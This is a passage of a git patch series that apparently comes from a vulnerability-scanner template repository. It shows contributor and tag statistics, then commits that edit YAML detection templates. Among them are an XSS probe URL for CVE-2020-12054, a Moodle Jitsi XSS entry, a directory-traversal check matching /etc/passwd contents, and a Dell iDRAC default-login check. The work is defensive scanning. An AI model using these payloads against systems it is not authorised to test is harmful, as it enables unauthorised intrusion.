4 | | | | | | | +| devops | 10 | iamnoooob | 4 | | | | | | | +| cve2011 | 10 | rootxharsh | 4 | | | | | | | +| cve2012 | 9 | binaryfigments | 3 | | | | | | | +| dlink | 9 | impramodsargar | 3 | | | | | | | +| magento | 9 | z3bd | 3 | | | | | | | +| jenkins | 9 | kophjager007 | 3 | | | | | | | +| airflow | 8 | fyoorer | 3 | | | | | | | +| cnvd | 8 | 0w4ys | 3 | | | | | | | +| ftp | 8 | shine | 3 | | | | | | | +| cve2013 | 8 | f1tz | 3 | | | | | | | +| aws | 8 | yash anand @yashanand155 | 3 | | | | | | | +| gitlab | 8 | tess | 3 | | | | | | | +| adobe | 8 | thomas_from_offensity | 3 | | | | | | | +| php | 8 | joanbono | 3 | | | | | | | +| cve2014 | 7 | 0xprial | 2 | | | | | | | +| joomla | 7 | kiblyn11 | 2 | | | | | | | +| vmware | 7 | zomsop82 | 2 | | | | | | | +| scada | 7 | bsysop | 2 | | | | | | | +| cms | 6 | davidmckennirey | 2 | | | | | | | +| nginx | 6 | 0xcrypto | 2 | | | | | | | +| rails | 6 | pxmme1337 | 2 | | | | | | | +| google | 6 | amsda | 2 | | | | | | | +| api | 6 | manas_harsh | 2 | | | | | | | +| backup | 6 | joeldeleep | 2 | | | | | | | +| citrix | 6 | hetroublemakr | 2 | | | | | | | +| rconfig | 6 | random-robbie | 2 | | | | | | | +| xxe | 6 | lotusdll | 2 | | | | | | | +| drupal | 5 | mavericknerd | 2 | | | | | | | +| solr | 5 | 0xrudra | 2 | | | | | | | +| circarlife | 5 | jarijaas | 2 | | | | | | | +| dell | 5 | 0xsapra | 2 | | | | | | | +| headless | 5 | incogbyte | 2 | | | | | | | +| lucee | 5 | unstabl3 | 2 | | | | | | | +| laravel | 5 | udit_thakkur | 2 | | | | | | | +| ruijie | 5 | swissky | 2 | | | | | | | +| ssti | 5 | randomrobbie | 2 | | | | | | | +| phpmyadmin | 5 | ree4pwn | 2 | | | | | | | +| jetty | 5 | mahendra purbia (mah3sec_) | 2 | | | | | | | +| java | 5 | afaq | 2 | | | | | | | +| confluence | 5 | bp0lr | 2 | | | | | | | +| iis | 5 | elsfa7110 | 2 | | | | | | | +| login | 5 | 0xelkomy | 2 | | | | | | | +| cve2009 | 4 | x1m_martijn | 2 | | | | | | | +| netgear | 4 | lu4nx | 2 | | | | | | | +| nodejs | 4 | foulenzer | 2 | | | | | | | +| jolokia | 4 | shifacyclewala | 2 | | | | | | | +| solarwinds | 4 | ehsahil | 2 | | | | | | | +| traversal | 4 | dheerajmadhukar | 2 | | | | | | | +| elastic | 4 | gevakun | 2 | | | | | | | +| router | 4 | vavkamil | 2 | | | | | | | +| vpn | 4 | emenalf | 2 | | | | | | | +| thinkphp | 4 | moritz nentwig | 2 | | | | | | | +| asp | 4 | arcc | 1 | | | | | | | +| django | 4 | hakluke | 1 | | | | | | | +| hongdian | 4 | rojanrijal | 1 | | | | | | | +| moodle | 4 | naglinagli | 1 | | | | | | | +| tomcat | 4 | shifacyclewla | 1 | | | | | | | +| artifactory | 4 | pdp | 1 | | | | | | | +| samsung | 4 | dawid czarnecki | 1 | | | | | | | +| magmi | 4 | deena | 1 | | | | | | | +| webserver | 4 | raesene | 1 | | | | | | | +| thinkcmf | 4 | bjhulst | 1 | | | | | | | +| docker | 4 | bing0o | 1 | | | | | | | +| fileupload | 4 | pudsec | 1 | | | | | | | +| ibm | 4 | remonsec | 1 | | | | | | | +| kafka | 3 | koti2 | 1 | | | | | | | +| ofbiz | 3 | yashgoti | 1 | | | | | | | +| openssh | 3 | thezakman | 1 | | | | | | | +| grafana | 3 | idealphase | 1 | | | | | | | +| log | 3 | streetofhackerr007 | 1 | | | | | | | +| springcloud | 3 | c3l3si4n | 1 | | | | | | | +| nosqli | 3 | akash.c | 1 | | | | | | | +| mongodb | 3 | aaron_costello | 1 | | | | | | | +| | | (@conspiracyproof) | | | | | | | | +| git | 3 | its0x08 | 1 | | | | | | | +| terramaster | 3 | becivells | 1 | | | | | | | +| fanruan | 3 | 0h1in9e | 1 | | | | | | | +| lfr | 3 | juicypotato1 | 1 | | | | | | | +| kubernetes | 3 | fabaff | 1 | | | | | | | +| oa | 3 | dogasantos | 1 | | | | | | | +| slack | 3 | th3.d1p4k | 1 | | | | | | | +| backups | 3 | alph4byt3 | 1 | | | | | | | +| ebs | 3 | tirtha_mandal | 1 | | | | | | | +| deserialization | 3 | j33n1k4 | 1 | | | | | | | +| microstrategy | 3 | regala_ | 1 | | | | | | | +| bypass | 3 | mohammedsaneem | 1 | | | | | | | +| dedecms | 3 | luci | 1 | | | | | | | +| crlf | 3 | ringo | 1 | | | | | | | +| vbulletin | 3 | luskabol | 1 | | | | | | | +| caucho | 3 | 0xrod | 1 | | | | | | | +| ssh | 3 | sushant kamble | 1 | | | | | | | +| | | (https://in.linkedin.com/in/sushantkamble) | | | | | | | | +| printer | 3 | manikanta a.k.a @secureitmania | 1 | | | | | | | +| nacos | 3 | taielab | 1 | | | | | | | +| windows | 3 | schniggie | 1 | | | | | | | +| amazon | 3 | kba@sogeti_esec | 1 | | | | | | | +| fpd | 3 | daviey | 1 | | | | | | | +| r-seenet | 3 | aceseven (digisec360) | 1 | | | | | | | +| resin | 3 | geraldino2 | 1 | | | | | | | +| zabbix | 2 | affix | 1 | | | | | | | +| sonarqube | 2 | _darrenmartyn | 1 | | | | | | | +| icewarp | 2 | bad5ect0r | 1 | | | | | | | +| oauth | 2 | rtcms | 1 | | | | | | | +| dos | 2 | berkdusunur | 1 | | | | | | | +| rockmongo | 2 | ipanda | 1 | | | | | | | +| seeyon | 2 | shelld3v | 1 | | | | | | | +| xxljob | 2 | 52971 | 1 | | | | | | | +| paloalto | 2 | furkansenan | 1 | | | | | | | +| odoo | 2 | johnjhacking | 1 | | | | | | | +| glassfish | 2 | @dwisiswant0 | 1 | | | | | | | +| strapi | 2 | manuelbua | 1 | | | | | | | +| wordfence | 2 | mubassirpatel | 1 | | | | | | | +| waf | 2 | undefl0w | 1 | | | | | | | +| saltstack | 2 | mah3sec_ | 1 | | | | | | | +| showdoc | 2 | cookiehanhoan | 1 | | | | | | | +| webcam | 2 | kabirsuda | 1 | | | | | | | +| ecology | 2 | iampritam | 1 | | | | | | | +| httpd | 2 | j3ssie/geraldino2 | 1 | | | | | | | +| proxy | 2 | b4uh0lz | 1 | | | | | | | +| sharepoint | 2 | toufik airane | 1 | | | | | | | +| nagios | 2 | notsoevilweasel | 1 | | | | | | | +| hp | 2 | knassar702 | 1 | | | | | | | +| rstudio | 2 | s1r1u5_ | 1 | | | | | | | +| prometheus | 2 | nytr0gen | 1 | | | | | | | +| nexus | 2 | sy3omda | 1 | | | | | | | +| huawei | 2 | ldionmarcil | 1 | | | | | | | +| telerik | 2 | absshax | 1 | | | | | | | +| spark | 2 | co0nan | 1 | | | | | | | +| mida | 2 | tim_koopmans | 1 | | | | | | | +| chamilo | 2 | noamrathaus | 1 | | | | | | | +| smtp | 2 | sshell | 1 | | | | | | | +| trixbox | 2 | kareemse1im | 1 | | | | | | | +| mail | 2 | patralos | 1 | | | | | | | +| zhiyuan | 2 | zandros0 | 1 | | | | | | | +| hjtcloud | 2 | ahmed sherif | 1 | | | | | | | +| rockethchat | 2 | _harleo | 1 | | | | | | | +| plesk | 2 | soyelmago | 1 | | | | | | | +| frp | 2 | ajaysenr | 1 | | | | | | | +| jboss | 2 | thevillagehacker | 1 | | | | | | | +| splunk | 2 | nkxxkn | 1 | | | | | | | +| vrealize | 2 | d0rkerdevil | 1 | | | | | | | +| microsoft | 2 | g4l1t0 and @convisoappsec | 1 | | | | | | | +| kibana | 2 | bolli95 | 1 | | | | | | | +| leak | 2 | defr0ggy | 1 | | | | | | | +| hpe | 2 | shreyapohekar | 1 | | | | | | | +| keycloak | 2 | smaranchand | 1 | | | | | | | +| service | 2 | sicksec | 1 | | | | | | | +| bitrix | 2 | 0xtavian | 1 | | | | | | | +| jellyfin | 2 | dudez | 1 | | | | | | | +| flir | 2 | fopina | 1 | | | | | | | +| exposures | 2 | sullo | 1 | | | | | | | +| cache | 2 | mhdsamx | 1 | | | | | | | +| voipmonitor | 2 | johnk3r | 1 | | | | | | | +| bigip | 2 | micha3lb3n | 1 | | | | | | | +| emerge | 2 | wabafet | 1 | | | | | | | +| shellshock | 2 | alex | 1 | | | | | | | +| injection | 2 | omarkurt | 1 | | | | | | | +| yapi | 2 | sid ahmed malaoui @ realistic | 1 | | | | | | | +| | | security | | | | | | | | +| ucmdb | 2 | ooooooo_q | 1 | | | | | | | +| intrusive | 2 | chron0x | 1 | | | | | | | +| fortios | 2 | gboddin | 1 | | | | | | | +| sonicwall | 2 | 0ut0fb4nd | 1 | | | | | | | +| pega | 2 | qlkwej | 1 | | | | | | | +| globalprotect | 2 | ratnadip gajbhiye | 1 | | | | | | | +| activemq | 2 | willd96 | 1 | | | | | | | +| cve2008 | 2 | apt-mirror | 1 | | | | | | | +| openam | 2 | _generic_human_ | 1 | | | | | | | +| coldfusion | 2 | ivo palazzolo (@palaziv) | 1 | | | | | | | +| openfire | 2 | divya_mudgal | 1 | | | | | | | +| hashicorp | 2 | kurohost | 1 | | | | | | | +| smb | 2 | _c0wb0y_ | 1 | | | | | | | +| maian | 2 | w4cky_ | 1 | | | | | | | +| couchdb | 2 | r3naissance | 1 | | | | | | | +| kentico | 2 | ilovebinbash | 1 | | | | | | | +| natshell | 2 | jeya seelan | 1 | | | | | | | +| nextjs | 2 | whynotke | 1 | | | | | | | +| idrac | 2 | akshansh | 1 | | | | | | | +| totaljs | 1 | exploitation | 1 | | | | | | | +| soar | 1 | ohlinge | 1 | | | | | | | +| traefik | 1 | yashanand155 | 1 | | | | | | | +| b2evolution | 1 | gal nagli | 1 | | | | | | | +| wavemaker | 1 | zhenwarx | 1 | | | | | | | +| enumeration | 1 | fmunozs | 1 | | | | | | | +| subrion | 1 | vsh00t | 1 | | | | | | | +| ems | 1 | @github.com/defr0ggy | 1 | | | | | | | +| comodo | 1 | elmahdi | 1 | | | | | | | +| yii | 1 | rodnt | 1 | | | | | | | +| htmli | 1 | yavolo | 1 | | | | | | | +| darkstat | 1 | abison_binoy | 1 | | | | | | | +| phalcon | 1 | alifathi-h1 | 1 | | | | | | | +| axis | 1 | hanlaomo | 1 | | | | | | | +| netsweeper | 1 | blckraven | 1 | | | | | | | +| jnoj | 1 | kishore krishna (sillydaddy) | 1 | | | | | | | +| skywalking | 1 | alperenkesk | 1 | | | | | | | +| targa | 1 | flag007 | 1 | | | | | | | +| octobercms | 1 | sickwell | 1 | | | | | | | +| tpshop | 1 | andirrahmani1 | 1 | | | | | | | +| azure | 1 | vzamanillo | 1 | | | | | | | +| heroku | 1 | streetofhackerr007 (rohit | 1 | | | | | | | +| | | soni) | | | | | | | | +| discord | 1 | | | | | | | | | +| nps | 1 | | | | | | | | | +| biometrics | 1 | | | | | | | | | +| bolt | 1 | | | | | | | | | +| woocomernce | 1 | | | | | | | | | +| ueditor | 1 | | | | | | | | | +| mcafee | 1 | | | | | | | | | +| wamp | 1 | | | | | | | | | +| bitly | 1 | | | | | | | | | +| cloudflare | 1 | | | | | | | | | +| optiLink | 1 | | | | | | | | | +| turbocrm | 1 | | | | | | | | | +| k8 | 1 | | | | | | | | | +| primetek | 1 | | | | | | | | | +| wuzhicms | 1 | | | | | | | | | +| eyou | 1 | | | | | | | | | +| swagger | 1 | | | | | | | | | +| firebase | 1 | | | | | | | | | +| zzzcms | 1 | | | | | | | | | +| dlogin | 1 | | | | | | | | | +| sidekiq | 1 | | | | | | | | | +| fortigate | 1 | | | | | | | | | +| nexusdb | 1 | | | | | | | | | +| concrete | 1 | | | | | | | | | +| db | 1 | | | | | | | | | +| setup | 1 | | | | | | | | | +| domxss | 1 | | | | | | | | | +| oscommerce | 1 | | | | | | | | | +| anchorcms | 1 | | | | | | | | | +| jenkin | 1 | | | | | | | | | +| cocoon | 1 | | | | | | | | | +| triconsole | 1 | | | | | | | | | +| tileserver | 1 | | | | | | | | | +| circontrol | 1 | | | | | | | | | +| openerp | 1 | | | | | | | | | +| selea | 1 | | | | | | | | | +| acme | 1 | | | | | | | | | +| centos | 1 | | | | | | | | | +| zimbra | 1 | | | | | | | | | +| ssltls | 1 | | | | | | | | | +| sentry | 1 | | | | | | | | | +| gloo | 1 | | | | | | | | | +| pyramid | 1 | | | | | | | | | +| vscode | 1 | | | | | | | | | +| lanproxy | 1 | | | | | | | | | +| mediumish | 1 | | | | | | | | | +| zarafa | 1 | | | | | | | | | +| flink | 1 | | | | | | | | | +| mirai | 1 | | | | | | | | | +| xdcms | 1 | | | | | | | | | +| smartsense | 1 | | | | | | | | | +| opensmtpd | 1 | | | | | | | | | +| itop | 1 | | | | | | | | | +| majordomo2 | 1 | | | | | | | | | +| zmanda | 1 | | | | | | | | | +| panabit | 1 | | | | | | | | | +| grav | 1 | | | | | | | | | +| redwood | 1 | | | | | | | | | +| acexy | 1 | | | | | | | | | +| kong | 1 | | | | | | | | | +| sitecore | 1 | | | | | | | | | +| salesforce | 1 | | | | | | | | | +| ulterius | 1 | | | | | | | | | +| alibaba | 1 | | | | | | | | | +| st | 1 | | | | | | | | | +| zeroshell | 1 | | | | | | | | | +| expn | 1 | | | | | | | | | +| xml | 1 | | | | | | | | | +| embedthis | 1 | | | | | | | | | +| avalanche | 1 | | | | | | | | | +| realteo | 1 | | | | | | | | | +| zend | 1 | | | | | | | | | +| opm | 1 | | | | | | | | | +| panos | 1 | | | | | | | | | +| nuxeo | 1 | | | | | | | | | +| linkerd | 1 | | | | | | | | | +| jitsi | 1 | | | | | | | | | +| jsp | 1 | | | | | | | | | +| hasura | 1 | | | | | | | | | +| monitorix | 1 | | | | | | | | | +| episerver | 1 | | | | | | | | | +| spf | 1 | | | | | | | | | +| chinaunicom | 1 | | | | | | | | | +| jsf | 1 | | | | | | | | | +| shopware | 1 | | | | | | | | | +| erp-nc | 1 | | | | | | | | | +| upnp | 1 | | | | | | | | | +| spidercontrol | 1 | | | | | | | | | +| aspnuke | 1 | | | | | | | | | +| klog | 1 | | | | | | | | | +| apiman | 1 | | | | | | | | | +| nordex | 1 | | | | | | | | | +| redhat | 1 | | | | | | | | | +| email | 1 | | | | | | | | | +| keenetic | 1 | | | | | | | | | +| proftpd | 1 | | | | | | | | | +| node | 1 | | | | | | | | | +| maccmsv10 | 1 | | | | | | | | | +| clave | 1 | | | | | | | | | +| cloudinary | 1 | | | | | | | | | +| dvwa | 1 | | | | | | | | | +| moinmoin | 1 | | | | | | | | | +| favicon | 1 | | | | | | | | | +| upload | 1 | | | | | | | | | +| cors | 1 | | | | | | | | | +| empirecms | 1 | | | | | | | | | +| feifeicms | 1 | | | | | | | | | +| node-red-dashboard | 1 | | | | | | | | | +| appweb | 1 | | | | | | | | | +| xiuno | 1 | | | | | | | | | +| socomec | 1 | | | | | | | | | +| stem | 1 | | | | | | | | | +| spring | 1 | | | | | | | | | +| thinkadmin | 1 | | | | | | | | | +| clusterengine | 1 | | | | | | | | | +| doh | 1 | | | | | | | | | +| rmi | 1 | | | | | | | | | +| pulsesecure | 1 | | | | | | | | | +| alertmanager | 1 | | | | | | | | | +| plone | 1 | | | | | | | | | +| fastcgi | 1 | | | | | | | | | +| adminer | 1 | | | | | | | | | +| kafdrop | 1 | | | | | | | | | +| ec2 | 1 | | | | | | | | | +| dom | 1 | | | | | | | | | +| hortonworks | 1 | | | | | | | | | +| cse | 1 | | | | | | | | | +| discourse | 1 | | | | | | | | | +| ruby | 1 | | | | | | | | | +| emby | 1 | | | | | | | | | +| codemeter | 1 | | | | | | | | | +| faraday | 1 | | | | | | | | | +| glances | 1 | | | | | | | | | +| ioncube | 1 | | | | | | | | | +| parentlink | 1 | | | | | | | | | +| aura | 1 | | | | | | | | | +| opencast | 1 | | | | | | | | | +| lansweeper | 1 | | | | | | | | | +| dvr | 1 | | | | | | | | | +| pgadmin | 1 | | | | | | | | | +| fiori | 1 | | | | | | | | | +| powercreator | 1 | | | | | | | | | +| wildfly | 1 | | | | | | | | | +| mailchimp | 1 | | | | | | | | | +| viewlinc | 1 | | | | | | | | | +| 74cms | 1 | | | | | | | | | +| ganglia | 1 | | | | | | | | | +| servicedesk | 1 | | | | | | | | | +| goahead | 1 | | | | | | | | | +| krweb | 1 | | | | | | | | | +| vsftpd | 1 | | | | | | | | | +| ricoh | 1 | | | | | | | | | +| shopxo | 1 | | | | | | | | | +| tensorboard | 1 | | | | | | | | | +| cobub | 1 | | | | | | | | | +| yachtcontrol | 1 | | | | | | | | | +| csrf | 1 | | | | | | | | | +| jquery | 1 | | | | | | | | | +| webui | 1 | | | | | | | | | +| kyan | 1 | | | | | | | | | +| cve2005 | 1 | | | | | | | | | +| zte | 1 | | | | | | | | | +| springframework | 1 | | | | | | | | | +| wmt | 1 | | | | | | | | | +| fortinet | 1 | | | | | | | | | +| javascript | 1 | | | | | | | | | +| mautic | 1 | | | | | | | | | +| duomicms | 1 | | | | | | | | | +| etouch | 1 | | | | | | | | | +| fedora | 1 | | | | | | | | | +| webmin | 1 | | | | | | | | | +| jmx | 1 | | | | | | | | | +| zenario | 1 | | | | | | | | | +| rujjie | 1 | | | | | | | | | +| geddy | 1 | | | | | | | | | +| mongo | 1 | | | | | | | | | +| wiki | 1 | | | | | | | | | +| fortigates | 1 | | | | | | | | | +| dompdf | 1 | | | | | | | | | +| igs | 1 | | | | | | | | | +| xunchi | 1 | | | | | | | | | +| diris | 1 | | | | | | | | | +| fortiweb | 1 | | | | | | | | | +| plc | 1 | | | | | | | | | +| zcms | 1 | | | | | | | | | +| npm | 1 | | | | | | | | | +| nedi | 1 | | | | | | | | | +| cve2010 | 1 | | | | | | | | | +| revision | 1 | | | | | | | | | +| javamelody | 1 | | | | | | | | | +| jenzabar | 1 | | | | | | | | | +| saltapi | 1 | | | | | | | | | +| dotnet | 1 | | | | | | | | | +| gridx | 1 | | | | | | | | | +| beanshell | 1 | | | | | | | | | +| lotuscms | 1 | | | | | | | | | +| haproxy | 1 | | | | | | | | | +| kubeflow | 1 | | | | | | | | | +| pippoint | 1 | | | | | | | | | +| trilithic | 1 | | | | | | | | | +| gateone | 1 | | | | | | | | | +| robomongo | 1 | | | | | | | | | +| akamai | 1 | | | | | | | | | +| postmessage | 1 | | | | | | | | | +| plugin | 1 | | | | | | | | | +| mongoshake | 1 | | | | | | | | | +| wooyun | 1 | | | | | | | | | +| lancom | 1 | | | | | | | | | +| mantisbt | 1 | | | | | | | | | +| circontrorl | 1 | | | | | | | | | +| octoprint | 1 | | | | | | | | | +| moin | 1 | | | | | | | | | +| sco | 1 | | | | | | | | | +| ntopng | 1 | | | | | | | | | +| netis | 1 | | | | | | | | | +| postgres | 1 | | | | | | | | | +| scs | 1 | | | | | | | | | +| blue-ocean | 1 | | | | | | | | | +| zm | 1 | | | | | | | | | +| mara | 1 | | | | | | | | | +| rfi | 1 | | | | | | | | | +| huijietong | 1 | | | | | | | | | +| blind | 1 | | | | | | | | | +| 2014 | 1 | | | | | | | | | +| ssl | 1 | | | | | | | | | +| ns | 1 | | | | | | | | | +| clockwatch | 1 | | | | | | | | | +| jeewms | 1 | | | | | | | | | +| tensorflow | 1 | | | | | | | | | +| tapestry | 1 | | | | | | | | | +| enum | 1 | | | | | | | | | +| drone | 1 | | | | | | | | | +| codeigniter | 1 | | | | | | | | | +| rsyncd | 1 | | | | | | | | | +| wso2 | 1 | | | | | | | | | +| payara | 1 | | | | | | | | | +| labtech | 1 | | | | | | | | | +| nette | 1 | | | | | | | | | +| gitlist | 1 | | | | | | | | | +| rubedo | 1 | | | | | | | | | +| webadmin | 1 | | | | | | | | | +| bullwark | 1 | | | | | | | | | +| ilo4 | 1 | | | | | | | | | +| geutebruck | 1 | | | | | | | | | +| ecom | 1 | | | | | | | | | +| tenda | 1 | | | | | | | | | +| rdp | 1 | | | | | | | | | +| jfrog | 1 | | | | | | | | | +| extractor | 1 | | | | | | | | | +| bookstack | 1 | | | | | | | | | +| sprintful | 1 | | | | | | | | | +| tamronos | 1 | | | | | | | | | +| blackboard | 1 | | | | | | | | | +| esmtp | 1 | | | | | | | | | +| sarg | 1 | | | | | | | | | +| bash | 1 | | | | | | | | | +| liferay | 1 | | | | | | | | | +| horde | 1 | | | | | | | | | +| cgi | 1 | | | | | | | | | +| zookeeper | 1 | | | | | | | | | +| harbor | 1 | | | | | | | | | +| pacsone | 1 | | | | | | | | | +| crm | 1 | | | | | | | | | +| javafaces | 1 | | | | | | | | | +| szhe | 1 | | | | | | | | | +| tika | 1 | | | | | | | | | +| razor | 1 | | | | | | | | | +| landray | 1 | | | | | | | | | +| kerbynet | 1 | | | | | | | | | +| netrc | 1 | | | | | | | | | +| druid | 1 | | | | | | | | | +| csod | 1 | | | | | | | | | +| mdb | 1 | | | | | | | | | +| vsphere | 1 | | | | | | | | | +| wazuh | 1 | | | | | | | | | +| nsasg | 1 | | | | | | | | | +| opentsdb | 1 | | | | | | | | | +| mpsec | 1 | | | | | | | | | +| spectracom | 1 | | | | | | | | | +| landrayoa | 1 | | | | | | | | | +| openrestry | 1 | | | | | | | | | +| linkedin | 1 | | | | | | | | | +| alerta | 1 | | | | | | | | | +| floc | 1 | | | | | | | | | +| weiphp | 1 | | | | | | | | | +| status | 1 | | | | | | | | | +| sqlite | 1 | | | | | | | | | +| uwsgi | 1 | | | | | | | | | +| synnefo | 1 | | | | | | | | | +| nuuo | 1 | | | | | | | | | +| exchange | 1 | | | | | | | | | +| opensns | 1 | | | | | | | | | +| openstack | 1 | | | | | | | | | +| finereport | 1 | | | | | | | | | +| flash | 1 | | | | | | | | | +| seacms | 1 | | | | | | | | | +| redis | 1 | | | | | | | | | +| backdoor | 1 | | | | | | | | | +| servicenow | 1 | | | | | | | | | +| plastic | 1 | | | | | | | | | +| viewpoint | 1 | | | | | | | | | +| arl | 1 | | | | | | | | | +| memcached | 1 | | | | | | | | | +| livezilla | 1 | | | | | | | | | +| wp-theme | 1 | | | | | | | | | +| phpinfo | 1 | | | | | | | | | +| rmc | 1 | | | | | | | | | +| dotnetnuke | 1 | | | | | | | | | +| avtech | 1 | | | | | | | | | +| emc | 1 | | | | | | | | | +| gogs | 1 | | | | | | | | | +| timeclock | 1 | | | | | | | | | +| calendarix | 1 | | | | | | | | | +| fastapi | 1 | | | | | | | | | +| xff | 1 | | | | | | | | | +| interlib | 1 | | | | | | | | | +| metinfo | 1 | | | | | | | | | +| symfony | 1 | | | | | | | | | +| rabbitmq | 1 | | | | | | | | | +| webmodule-ee | 1 | | | | | | | | | +| nc2 | 1 | | | | | | | | | +| checkpoint | 1 | | | | | | | | | +| grails | 1 | | | | | | | | | +| tongda | 1 | | | | | | | | | +| phpunit | 1 | | | | | | | | | +| webftp | 1 | | | | | | | | | +| starttls | 1 | | | | | | | | | +| netdata | 1 | | | | | | | | | +| varnish | 1 | | | | | | | | | +| ambari | 1 | | | | | | | | | +| k8s | 1 | | | | | | | | | +| linksys | 1 | | | | | | | | | +| fortilogger | 1 | | | | | | | | | +| cve2007 | 1 | | | | | | | | | +| fuelcms | 1 | | | | | | | | | +| nomad | 1 | | | | | | | | | +| svn | 1 | | | | | | | | | +| portainer | 1 | | | | | | | | | +| timesheet | 1 | | | | | | | | | +| visionhub | 1 | | | | | | | | | +| hadoop | 1 | | | | | | | | | +| idemia | 1 | | | | | | | | | +| myucms | 1 | | | | | | | | | +| mysql | 1 | | | | | | | | | +| bruteforce | 1 | | | | | | | | | +| rhymix | 1 | | | | | | | | | +| svnserve | 1 | | | | | | | | | +| wifisky | 1 | | | | | | | | | +| mobileiron | 1 | | | | | | | | | From 414883f719c9ac4d5a50900a11a6b5081cd0506e Mon Sep 17 00:00:00 2001 From: sandeep Date: Mon, 19 Jul 2021 23:55:15 +0530 Subject: [PATCH 101/149] Update CVE-2020-12054.yaml --- cves/2020/CVE-2020-12054.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/cves/2020/CVE-2020-12054.yaml b/cves/2020/CVE-2020-12054.yaml index 2ab2fab4c9..60bcb223fb 100644 --- a/cves/2020/CVE-2020-12054.yaml +++ b/cves/2020/CVE-2020-12054.yaml @@ -11,13 +11,13 @@ info: requests: - method: GET path: - - '{{BaseURL}}/?s=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + - '{{BaseURL}}/?s=%3Cimg%20src%3Dx%20onerror%3Dalert%28123%29%3B%3E' matchers-condition: and matchers: - type: word words: - - "" + - "" - "catch-breadcrumb" part: body condition: and @@ -29,4 +29,4 @@ requests: - type: status status: - - 200 + - 200 \ No newline at end of file From 13d26d8c6d4f10431357de4a7c330cc511e416f3 Mon Sep 17 00:00:00 2001 From: sandeep Date: Tue, 20 Jul 2021 00:10:30 +0530 Subject: [PATCH 102/149] moving files around --- .../2021/CVE-2021-26812.yaml | 10 ++++++---- 1 file changed, 6 insertions(+), 4 deletions(-) rename vulnerabilities/moodle/moodle-jitsi-plugin-xss.yaml => cves/2021/CVE-2021-26812.yaml (72%) diff --git a/vulnerabilities/moodle/moodle-jitsi-plugin-xss.yaml b/cves/2021/CVE-2021-26812.yaml similarity index 72% rename from vulnerabilities/moodle/moodle-jitsi-plugin-xss.yaml rename to cves/2021/CVE-2021-26812.yaml index 00843f0d3f..23274c8a84 100644 --- a/vulnerabilities/moodle/moodle-jitsi-plugin-xss.yaml +++ b/cves/2021/CVE-2021-26812.yaml @@ -1,12 +1,14 @@ -id: moodle-jitsi-plugin-xss +id: CVE-2021-26812 info: name: Moodle jitsi plugin XSS author: aceseven (digisec360) description: Cross-site Scripting in moodle jitsi plugin severity: medium - tags: moodle,jitsi,xss,revision - reference: https://github.com/udima-university/moodle-mod_jitsi/issues/67 + tags: cve,cve2021,moodle,jitsi,xss + reference: | + - https://github.com/udima-university/moodle-mod_jitsi/issues/67 + - https://nvd.nist.gov/vuln/detail/CVE-2021-26812 requests: - method: GET @@ -27,4 +29,4 @@ requests: - type: word part: header words: - - "text/html" + - "MoodleSession" \ No newline at end of file From 390e9191ec7bd30eb2b259ab75af9e421972bfbb Mon Sep 17 00:00:00 2001 From: sandeep Date: Tue, 20 Jul 2021 00:11:27 +0530 Subject: [PATCH 103/149] minor update --- .nuclei-ignore | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/.nuclei-ignore b/.nuclei-ignore index 4c03aa907a..fe634beab1 100644 --- a/.nuclei-ignore +++ b/.nuclei-ignore @@ -8,10 +8,9 @@ # unless asked for by the user. tags: + - "fuzz" - "dos" - "misc" - - "fuzz" - - "revision" # files is a list of files to ignore template execution # unless asked for by the user. \ No newline at end of file From 9d19d5fb5b5bb5a9b942af8944a378cad46b4e5b Mon Sep 17 00:00:00 2001 From: sandeep Date: Tue, 20 Jul 2021 00:12:01 +0530 Subject: [PATCH 104/149] description update --- cves/2021/CVE-2021-26812.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-26812.yaml b/cves/2021/CVE-2021-26812.yaml index 23274c8a84..c6316beaa3 100644 --- a/cves/2021/CVE-2021-26812.yaml +++ b/cves/2021/CVE-2021-26812.yaml @@ -3,7 +3,7 @@ id: CVE-2021-26812 info: name: Moodle jitsi plugin XSS author: aceseven (digisec360) - description: Cross-site Scripting in moodle jitsi plugin + description: Cross Site Scripting (XSS) in the Jitsi Meet 2.7 through 2.8.3 plugin for Moodle via the "sessionpriv.php" module. This allows attackers to craft a malicious URL, which when clicked on by users, can inject javascript code to be run by the application. severity: medium tags: cve,cve2021,moodle,jitsi,xss reference: | From aa2c8d210bd483c5d13fb119a2d1d20826b9bf33 Mon Sep 17 00:00:00 2001 From: Sandeep Singh Date: Tue, 20 Jul 2021 00:15:32 +0530 Subject: [PATCH 105/149] Update CVE-2018-16059.yaml --- cves/2018/CVE-2018-16059.yaml | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/cves/2018/CVE-2018-16059.yaml b/cves/2018/CVE-2018-16059.yaml index 030e0e9f95..d907c47ceb 100644 --- a/cves/2018/CVE-2018-16059.yaml +++ b/cves/2018/CVE-2018-16059.yaml @@ -3,8 +3,10 @@ id: CVE-2018-16059 info: name: WirelessHART Fieldgate SWG70 3.0 - Directory Traversal author: daffainfo - severity: high - reference: https://www.exploit-db.com/exploits/45342 + severity: medium + reference: | + - https://nvd.nist.gov/vuln/detail/CVE-2018-16059 + - https://www.exploit-db.com/exploits/45342 tags: cve,cve2018,iot,lfi requests: @@ -15,7 +17,6 @@ requests: matchers-condition: and matchers: - - type: regex regex: - "root:[x*]:0:0" From 7d94c55a789a47bdd55b740b53e7af050456f54e Mon Sep 17 00:00:00 2001 From: sandeep Date: Tue, 20 Jul 2021 00:30:02 +0530 Subject: [PATCH 106/149] minor improvements --- default-logins/dell/dell-idrac9-default-login.yaml | 3 +++ 1 file changed, 3 insertions(+) diff --git a/default-logins/dell/dell-idrac9-default-login.yaml b/default-logins/dell/dell-idrac9-default-login.yaml index 10fe93be8f..78d78f3130 100644 --- a/default-logins/dell/dell-idrac9-default-login.yaml +++ b/default-logins/dell/dell-idrac9-default-login.yaml @@ -25,6 +25,9 @@ requests: - type: status status: - 201 + - 200 + condition: or + - type: word part: body words: From 4dbf36813ddd09c0e2ebdfc9689d5bfdbdf59012 Mon Sep 17 00:00:00 2001 From: sandeep Date: Tue, 20 Jul 2021 00:43:39 +0530 Subject: [PATCH 107/149] removing duplicate template --- cves/2018/CVE-2018-7422.yaml | 12 +++++++----- .../wordpress/wp-site-editor-lfi.yaml | 19 ------------------- 2 files changed, 7 insertions(+), 24 deletions(-) delete mode 100644 vulnerabilities/wordpress/wp-site-editor-lfi.yaml diff --git 